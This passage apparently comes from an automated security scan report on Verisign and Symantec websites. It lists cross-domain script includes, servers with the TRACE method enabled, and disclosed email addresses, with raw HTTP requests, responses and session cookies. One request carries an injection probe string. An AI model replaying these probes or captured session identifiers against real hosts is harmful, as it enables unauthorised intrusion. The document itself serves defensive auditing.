http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

Response

15.33. http://www.verisign.ch/contact-information/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/contact-information/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

Response

15.34. http://www.verisign.ch/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/corporate/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js
http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent
http://www.verisign.com/hp07/j/swfobj.js
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

Response

15.35. http://www.verisign.ch/trust-seal/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/trust-seal/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js
http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://www.verisign.com/js/mbox.js

Request

Response

15.36. http://www.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

Response

15.37. http://www.verisign.com/code-signing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/code-signing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://www.googleadservices.com/pagead/conversion.js

Request

Response

15.38. http://www.verisign.com/partners/ssl-reseller-programs/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/partners/ssl-reseller-programs/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://s7.addthis.com/js/250/addthis_widget.js?username=verisign

Request

Response

15.39. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://s7.addthis.com/js/250/addthis_widget.js?username=verisign

Request

Response

15.40. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/partners/ssl-reseller-programs/resell-ssl/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://s7.addthis.com/js/250/addthis_widget.js?username=verisign

Request

Response

15.41. http://www.verisign.com/ssl/buy-ssl-certificates/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/ssl/buy-ssl-certificates/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Type: text/html
Content-Length: 104571

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" />


<link href="ht
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

15.42. http://www.verisign.com/trust-seal/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/trust-seal/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign

Request

Response

15.43. http://www.verisign.com/verisign-worldwide/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/verisign-worldwide/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://s7.addthis.com/js/250/addthis_widget.js?username=verisign

Request

Response

15.44. https://www.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

Response

15.45. https://www.verisign.com/products-services/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/products-services/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://s7.addthis.com/js/250/addthis_widget.js?username=verisign

Request

Response

16. TRACE method is enabled previous next
There are 7 instances of this issue:

http://1168.ic-live.com/
http://blogs.verisign.com/
https://cert.webtrust.org/
https://donate.mozilla.org/
https://partnernet.symantec.com/
http://press.verisign.com/
https://press.verisign.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

16.1. http://1168.ic-live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://1168.ic-live.com
Path:	/

Request

TRACE / HTTP/1.0
Host: 1168.ic-live.com
Cookie: 3a8169a39c743817

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from i2a-coll-17
X-Cache-Lookup: NONE from i2a-coll-17:80
Via: 1.0 i2a-coll-17:80 (squid/2.6.STABLE21)
Connection: close

TRACE / HTTP/1.0
Host: 1168.ic-live.com
Cookie: 3a8169a39c743817; cvt586=106159628; ngx_userid=50.23.123.106:1315327539133; pid2=1315301244rR4cN0jX2yM1; cvt522=33083100; sid1168=1315603546sI0iG1jH0qF3
Via: 1.0 i2a-coll-17:80 (squid/2.6.STABLE21)
X-Forwarded-For:
...[SNIP]...

16.2. http://blogs.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.verisign.com
Path:	/

Request

TRACE / HTTP/1.0
Host: blogs.verisign.com
Cookie: c714ff1fc488237d

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: blogapp:8080
Cookie: c714ff1fc488237d; v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0
...[SNIP]...

16.3. https://cert.webtrust.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cert.webtrust.org
Path:	/

Request

TRACE / HTTP/1.0
Host: cert.webtrust.org
Cookie: 96a6b86bb9621aaa

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:31 GMT
Server: Apache/1.3.27 (Unix) PHP/4.3.1 mod_ssl/2.8.14 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 96a6b86bb9621aaa
Host: cert.webtrust.org

16.4. https://donate.mozilla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://donate.mozilla.org
Path:	/

Request

TRACE / HTTP/1.0
Host: donate.mozilla.org
Cookie: f47eeb57d4e2c95f

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Date: Fri, 09 Sep 2011 22:14:47 GMT
Connection: close
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/

TRACE / HTTP/1.0
X-Cluster-SSL: 1
Host: donate.mozilla.org
X-Cluster-Client-Ip: 50.23.123.106
Cookie: f47eeb57d4e2c95f; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC; WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Connection: Keep-Alive

16.5. https://partnernet.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://partnernet.symantec.com
Path:	/

Request

TRACE / HTTP/1.0
Host: partnernet.symantec.com
Cookie: aa6e229900a35a85

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:06 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: partnernet.symantec.com
Cookie: aa6e229900a35a85; JSESSIONID=JpgsTqLJpsGcTPQ9r6vf2nW4Lnx1ZQCYB8m9fcNQn2D7vsdhGhHr!-248941162; s_sv_112_s1=1@16@a//1315621570007; SymantecMobile=false; IS3_History=0-0-0____; s_sq=%5B%5BB%5D%5D; bizProdScrollVertical=0
...[SNIP]...

16.6. http://press.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://press.verisign.com
Path:	/

Request

TRACE / HTTP/1.0
Host: press.verisign.com
Cookie: 356f27a0513049ad

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:42:30 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: press.verisign.com
Cookie: 356f27a0513049ad; JSESSIONID=9B66B2337E3BDAC61E4B94714CBA6DB4; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(
...[SNIP]...

16.7. https://press.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://press.verisign.com
Path:	/

Request

TRACE / HTTP/1.0
Host: press.verisign.com
Cookie: dfcbafb64e98c2be

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:42:31 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: press.verisign.com
Cookie: dfcbafb64e98c2be; JSESSIONID=9B66B2337E3BDAC61E4B94714CBA6DB4; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(
...[SNIP]...

17. Email addresses disclosed previous next
There are 71 instances of this issue:

http://blogs.verisign.com/
http://blogs.verisign.com/web-user-experience/
http://cdn.verisign.com/assets/shared/js/jquery.cookie.js
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
https://enterprise-ssl-admin.verisign.com/
https://fileconnect.symantec.com/javascript/calendar2.js
https://idprotect.verisign.com/learnmore.v
https://idprotect.verisign.com/orderstart.v
https://idprotect.verisign.com/toolbar/activate.v
https://idprotect.verisign.com/toolbar/download.v
https://idprotect.verisign.com/toolbar/home.v
https://idprotect.verisign.com/toolbar/install.v
https://idprotect.verisign.com/wheretouse.v
https://knowledge.verisign.ch/support/code-signing-support/index.html
https://knowledge.verisign.ch/support/digital-id-support/index.html
https://knowledge.verisign.ch/support/mpki-support/index.html
https://knowledge.verisign.ch/support/ssl-certificates-support/index
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
https://knowledge.verisign.ch/support/trust-seal-support/index.html
https://knowledge.verisign.com/apps/infocenter/sites/verisign/js/jquery.hover_intent.js
https://knowledge.verisign.com/support/code-signing-support/index
https://knowledge.verisign.com/support/code-signing-support/index.html
https://knowledge.verisign.com/support/digital-id-support/index.html
https://knowledge.verisign.com/support/eca-support/index.html
https://knowledge.verisign.com/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js
https://knowledge.verisign.com/support/mpki-for-ssl-support/index
https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
https://knowledge.verisign.com/support/mpki-support/index.html
https://knowledge.verisign.com/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js
https://knowledge.verisign.com/support/ssl-certificates-support/index
https://knowledge.verisign.com/support/ssl-certificates-support/index.html
https://knowledge.verisign.com/support/trust-seal-support/index.html
http://partnerlocator.symantec.com/static/prod_plocator_s_code.js
https://policy3.responsys.net/privacy.htm
https://press.verisign.com/easyir/customrel.do
http://query.verisign.ch/search
http://query.verisign.com/cluster.js
http://query.verisign.com/common.js
http://query.verisign.com/search
http://query.verisign.com/uri.js
https://query.verisign.com/search
https://renewals.symantec.com/renewals/chat_form.jsp
https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js
http://us.norton.com/beta/overview.jsp
http://us.norton.com/familyresources/index.jsp
http://us.norton.com/scripts/colorbox/norton/jquery.colorbox-min.js
https://vipmanager.verisign.com/vipmgr/createtrialaccount.v
http://vipmobile.verisign.com/home.v
https://vipmobile.verisign.com/home.v
https://vipmobile.verisign.com/supportedphones.v
https://www-secure.symantec.com/about/profile/policies/privacy.jsp
http://www.symantec.com/business/theme.jsp
http://www.symantec.com/connect/
http://www.symantec.com/searchg/common.js
http://www.symantec.com/searchg/uri.js
http://www.verisign.ch/
http://www.verisign.ch/contact-information/index.html
http://www.verisign.ch/corporate/index.html
http://www.verisign.ch/trust-seal/index.html
http://www.verisign.com/
http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/partners/ssl-reseller-programs/index.html
http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
http://www.verisign.com/ssl/buy-ssl-certificates/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/verisign-worldwide/index.html
https://www.verisign.com/
https://www.verisign.com/products-services/index.html

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

17.1. http://blogs.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.verisign.com
Path:	/

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.2. http://blogs.verisign.com/web-user-experience/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.verisign.com
Path:	/web-user-experience/

Issue detail

The following email address was disclosed in the response:

reshma.kumar@gmail.com

Request

GET /web-user-experience/ HTTP/1.1
Host: blogs.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.3. http://cdn.verisign.com/assets/shared/js/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.verisign.com
Path:	/assets/shared/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /assets/shared/js/jquery.cookie.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Age: 6982
Date: Fri, 09 Sep 2011 21:27:08 GMT
Last-Modified: Wed, 19 Jan 2011 20:34:23 GMT
Expires: Sun, 09 Oct 2011 13:03:09 GMT
Content-Length: 4341
Connection: keep-alive

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

17.4. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.hover_intent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 39037
Expires: Sun, 09 Oct 2011 10:47:51 GMT
Content-Length: 1614

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.5. https://enterprise-ssl-admin.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprise-ssl-admin.verisign.com
Path:	/

Issue detail

The following email address was disclosed in the response:

enterprise-sslsupport@verisign.com

Request

GET / HTTP/1.1
Host: enterprise-ssl-admin.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:41:53 GMT
Content-length: 1304
Content-type: text/html
Connection: close

<HTML>

<HEAD>
<TITLE>HTTP 403 Forbidden: Invalid Certificate for Client Authentication</TITLE>
<link href="../stylesheet.css" rel="stylesheet" type="text/css" />
</HEAD>

<BODY>
<table width=720 bord
...[SNIP]...
<A HREF="mailto: enterprise-sslsupport@verisign.com">
...[SNIP]...

17.6. https://fileconnect.symantec.com/javascript/calendar2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://fileconnect.symantec.com
Path:	/javascript/calendar2.js

Issue detail

The following email addresses were disclosed in the response:

feedback@softcomplex.com
sales@softcomplex.com

Request

GET /javascript/calendar2.js HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:54 GMT
Content-length: 6722
Last-Modified: Sat, 21 May 2011 05:26:42 GMT
Accept-Ranges: bytes

// Title: Tigra Calendar
// Description: See the demo at url
// URL: http://www.softcomplex.com/products/tigra_calendar/
// Version: 3.1 (American date format)
// Date: 08-08-2002 (mm-dd-yyyy)
// Feedback: feedback@softcomplex.com (specify product title in the subject)
// Note: Permission given to use this script in ANY kind of applications if
// header lines are left unchanged.
// Note: Script consists of two files: calendar?.js and calendar.html
// About us: Our company provides offshore IT consulting services.
// Contact us at sales@softcomplex.com if you have any programming task you
// want to be handled by professionals. Our typical hourly rate is $20.

// if two digit year input dates after this year considered 20 century.
var NUM_CEN
...[SNIP]...

17.7. https://idprotect.verisign.com/learnmore.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/learnmore.v

Issue detail

The following email address was disclosed in the response:

vip-support@verisign.com

Request

GET /learnmore.v HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/download.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:50:38 GMT
Content-Type: text/html
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 11736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.8. https://idprotect.verisign.com/orderstart.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/orderstart.v

Issue detail

The following email address was disclosed in the response:

vip-support@verisign.com

Request

GET /orderstart.v HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/wheretouse.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:50:55 GMT
Content-Type: text/html
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.9. https://idprotect.verisign.com/toolbar/activate.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/activate.v

Issue detail

The following email address was disclosed in the response:

vip-support@verisign.com

Request

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:47:43 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5737
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.10. https://idprotect.verisign.com/toolbar/download.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/download.v

Issue detail

The following email address was disclosed in the response:

vip-support@verisign.com

Request

GET /toolbar/download.v HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:39 GMT
Content-Type: text/html
